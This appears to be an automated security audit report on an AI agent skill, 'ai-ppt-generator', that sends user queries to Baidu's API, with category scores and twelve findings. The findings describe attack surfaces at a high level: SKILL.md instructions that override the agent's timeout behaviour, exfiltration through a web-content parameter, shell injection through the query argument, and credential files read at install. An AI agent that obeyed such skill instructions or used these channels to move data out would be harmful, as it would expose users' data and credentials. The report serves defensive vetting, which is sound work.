Is ai-ppt-generator safe?

https://clawhub.ai/ide-rea/ai-ppt-generator

62
CAUTION

The ai-ppt-generator skill is a thin wrapper around Baidu's AI PPT generation API that sends user queries verbatim to Chinese cloud infrastructure (qianfan.baidubce.com) with no local processing or data filtering. While no overt malicious behavior was detected, the skill presents significant data privacy concerns due to unfiltered external data transmission, undeclared dependencies, and behavioral override instructions that extend agent session timeouts. The installation phase showed access to sensitive credential files (.env, .aws/credentials), though this appears to be platform behavior rather than skill-initiated.

Category Scores

Prompt Injection 75/100 · 30%
Data Exfiltration 45/100 · 25%
Code Execution 55/100 · 20%
Clone Behavior 55/100 · 10%
Canary Integrity 100/100 · 10%
Behavioral Reasoning 50/100 · 5%

Findings (12)

HIGH User queries sent verbatim to external Chinese cloud API -35

All user input passed via --query is transmitted directly to qianfan.baidubce.com (Baidu AI) with no local sanitization, content filtering, or data minimization. Users may unknowingly send sensitive business content to Baidu's servers when generating PPTs.

HIGH API key transmitted to external service -20

BAIDU_API_KEY is read from the environment and sent as a Bearer token to Baidu's API. While this is the intended design, the skill provides no validation that the endpoint is legitimate, making it vulnerable to DNS spoofing or API endpoint substitution.

MEDIUM Undeclared external dependency (requests library) -15

The script imports 'requests' but no requirements.txt or package.json exists for the ai-ppt-generator skill. This means either the dependency is assumed pre-installed or a separate undocumented installation step is needed, which could be exploited for supply chain attacks.

MEDIUM Command-line argument injection surface -15

The --query parameter accepts arbitrary user input as a command-line argument. If the calling agent does not properly shell-escape the query string, this creates a shell injection vector.

MEDIUM Behavioral override instructions in SKILL.md -15

The SKILL.md instructs the agent to override its default timeout behavior, maintain long-running sessions (180+ seconds), and not treat slow responses as failures. While these are legitimate operational requirements, they could be weaponized to keep agent sessions occupied or to mask delayed exfiltration.

MEDIUM Arbitrary web content injection parameter -15

The --web_content parameter allows passing arbitrary content to the Baidu API. This could be abused to exfiltrate data by encoding it as 'web content' for PPT generation.

MEDIUM Sensitive file access during installation -30

The filesystem monitor detected reads of .env, .aws/credentials, and auth-profiles.json during the skill installation phase. While likely caused by the OpenClaw platform rather than the skill itself, this indicates sensitive credentials are exposed during the install process.

MEDIUM JIT compilation artifacts created during install -15

Multiple .cjs files were created in /tmp/jiti/ during installation, indicating a JIT compilation step. While likely from the OpenClaw platform, these compiled files could theoretically contain modified code.

LOW Skill metadata uses openclaw namespace instead of clawdbot -10

The skill uses 'openclaw' metadata namespace while the co-installed crypto-price uses 'clawdbot'. This inconsistency suggests the skill may be from a different ecosystem or forked platform, warranting additional scrutiny.

LOW No error sanitization in output -10

Exception handling prints raw error types and messages to stdout, which could leak internal system information (file paths, library versions, stack traces) back through the agent to the user or logs.

INFO Co-installed skill (crypto-price) not part of audit target -5

The ai-ppt-generator was installed alongside crypto-price, which is a separate skill with its own API calls and data handling. The interaction between these skills was not the focus of this audit but should be considered for holistic security assessment.

INFO Generated PPT files hosted on third-party infrastructure 0

The PPT download URLs returned by Baidu point to their cloud infrastructure. Users downloading these files are subject to Baidu's tracking, and the files could theoretically be modified server-side after generation.